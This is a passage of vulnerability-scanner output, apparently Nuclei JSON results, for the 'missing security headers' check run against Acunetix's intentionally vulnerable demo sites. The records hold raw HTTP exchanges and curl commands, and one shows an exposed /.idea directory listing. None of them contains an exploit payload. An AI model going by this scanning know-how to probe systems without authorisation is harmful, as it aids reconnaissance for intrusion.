Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:11.891256338Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:11.891314322Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:12.489741317Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:51 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:12.489799739Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n 